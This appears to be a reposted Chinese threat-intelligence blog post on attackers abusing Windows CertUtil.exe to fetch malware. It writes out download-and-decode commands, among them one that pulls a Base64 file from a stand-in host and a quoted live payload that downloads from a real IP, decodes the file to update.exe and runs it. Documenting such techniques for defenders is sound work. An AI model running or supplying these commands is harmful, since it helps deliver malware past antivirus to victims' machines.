CertUtil.exe被利用来下载恶意软件
1、前言
經過國外文章信息,CertUtil.exe下載惡意軟件的樣本。
2、實現原理
Windows有一個名為CertUtil的內置程序,可用于在Windows中管理證書。使用此程序可以在Windows中安裝,備份,刪除,管理和執行與證書和證書存儲相關的各種功能。
CertUtil的一個特性是能夠從遠程URL下載證書或任何其他文件。
使用語法 :
"certutil.exe -urlcache -split -f [URL] output.file"Casey Smith(https://twitter.com/subTee) 在2017年就已經公布的相關利用方法。
certutil -urlcache -split -f [serverURL] file.blahregsvr32.exe /s /u /I:file.blah scrub.dll3、實際例子
目前在威脅情報平臺里已經可以搜索到利用這種手法的相關病毒樣本,樣本中利用的方法:
4、混淆方式
- 使用CertUtil + Base64來繞過安全軟件
通過Base64對惡意文件進行編碼,使惡意代碼樣本看起來像是無害的文本文件,然后使用CertUtil.exe下載后對其進行解碼。下載了文本文件使用“Certutil.exe -decode”命令將Base64編碼文件解碼為可執行文件。
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txtC:\Temp>certutil.exe -decode bad.txt bad.exe在F5 Labs上有一篇利用漏洞的文章中提到了利用certutil下載文件的方式攻擊Web服務器。Payload部分內容如下:
一旦文件下載并使用certutil進行 base64解碼,它將被保存為update.exe并執行。
certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64&certutil -decode update.b64 update.exe&update.exe5、樣本HASH與分析結果
- 分析平臺分析結果:
IOC(Indicators of Compromise)
- IP:
- 文件名與HASH值:
6、參考
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
https://f5.com/labs/articles/threat-intelligence/malware/old-dog-new-targets-switching-to-windows-to-mine-electroneum
https://www.bleepingcomputer.com/news/security/regsvr32-can-be-used-to-install-ransomware-through-jscript-installers/
轉載于:https://www.cnblogs.com/17bdw/p/8728656.html
總結
以上是生活随笔為你收集整理的CertUtil.exe被利用来下载恶意软件的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: org.apache.maven.arc
- 下一篇: react事件处理函数中绑定this的b